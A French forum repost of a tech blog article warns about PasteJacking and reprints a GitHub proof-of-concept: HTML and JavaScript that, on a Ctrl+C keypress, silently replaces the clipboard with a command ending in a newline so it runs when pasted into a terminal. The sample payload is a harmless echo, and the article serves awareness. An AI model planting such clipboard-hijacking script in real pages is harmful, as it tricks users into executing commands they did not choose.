Jump to content
View in the app

A better way to browse. Learn more.
Forum Supreme-Elite

A full-screen app on your home screen with push notifications, badges and more.

To install this app on iOS and iPadOS
  1. Tap the Share icon in Safari
  2. Scroll the menu and tap Add to Home Screen.
  3. Tap Add in the top-right corner.
To install this app on Android
  1. Tap the 3-dot menu (⋮) in the top-right corner of the browser.
  2. Tap Add to Home screen or Install app.
  3. Confirm by tapping Install.

Attention au PasteJacking (et merci de ne pas copier coller cet article)

Korben
in Actu du Net

Featured Replies

La technique n'est pas nouvelle et j'ai déjà abordé le problème en 2015. En gros, il est possible avec un simple bout de javascript, de mettre autre chose dans le presse-papier de l'ordinateur en cas de copier coller.

Cela peut poser de nombreux soucis notamment sur les sites qui donnent des lignes de commande que les gens copient et collent machinalement. J'ai déjà mis en garde sur le sujet donc je ne reviendrai pas dessus (aller lire l'article linké ci-dessus). Par contre, pour ceux qui veulent comprendre comment ça fonctionne, sachez qu'un bout de code baptisé PasteJacking est disponible sur Github.

Voici le code en question :

<html>

<body>

Copy the text below and run it in your terminal for totally not evil things to happen.

</br>

<p>echo "not evil"</p>

<script>

function copyTextToClipboard(text) {

var textArea = document.createElement("textarea");

//

// *** This styling is an extra step which is likely not required. ***

//

// Why is it here? To ensure:

// 1. the element is able to have focus and selection.

// 2. if element was to flash render it has minimal visual impact.

// 3. less flakyness with selection and copying which **might** occur if

// the textarea element is not visible.

//

// The likelihood is the element won't even render, not even a flash,

// so some of these are just precautions. However in IE the element

// is visible whilst the popup box asking the user for permission for

// the web page to copy to the clipboard.

//

// Place in top-left corner of screen regardless of scroll position.

textArea.style.position = 'fixed';

textArea.style.top = 0;

textArea.style.left = 0;

// Ensure it has a small width and height. Setting to 1px / 1em

// doesn't work as this gives a negative w/h on some browsers.

textArea.style.width = '2em';

textArea.style.height = '2em';

// We don't need padding, reducing the size if it does flash render.

textArea.style.padding = 0;

// Clean up any borders.

textArea.style.border = 'none';

textArea.style.outline = 'none';

textArea.style.boxShadow = 'none';

// Avoid flash of white box if rendered for any reason.

textArea.style.background = 'transparent';

textArea.value = text;

document.body.appendChild(textArea);

textArea.select();

try {

var successful = document.execCommand('copy');

var msg = successful ? 'successful' : 'unsuccessful';

console.log('Copying text command was ' + msg);

} catch (err) {

console.log('Oops, unable to copy');

}

document.body.removeChild(textArea);

}

document.addEventListener('keydown', function(event) {

var ms = 800;

var start = new Date().getTime();

var end = start;

while(end < start + ms) {

end = new Date().getTime();

}

copyTextToClipboard('echo "evil"n');

});

</script>

</body>

</html>

Pour que ça fonctionne, il faut que la victime fasse un CTRL+C (ou CMD + C sous OSX). Si elle fait un clic droit "copier", ça ne fonctionnera pas.

Cet article merveilleux et sans aucun égal intitulé : Attention au PasteJacking (et merci de ne pas copier coller cet article) ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.



Voir l'article complet
https://forum.supreme-elite.fr/topic/18944-attention-au-pastejacking-et-merci-de-ne-pas-copier-coller-cet-article/
Go to topic listing

Configure browser push notifications
Chrome (Android)
  1. Tap the lock icon next to the address bar.
  2. Tap Permissions → Notifications.
  3. Adjust your preference.
Chrome (Desktop)
  1. Click the padlock icon in the address bar.
  2. Select Site settings.
  3. Find Notifications and adjust your preference.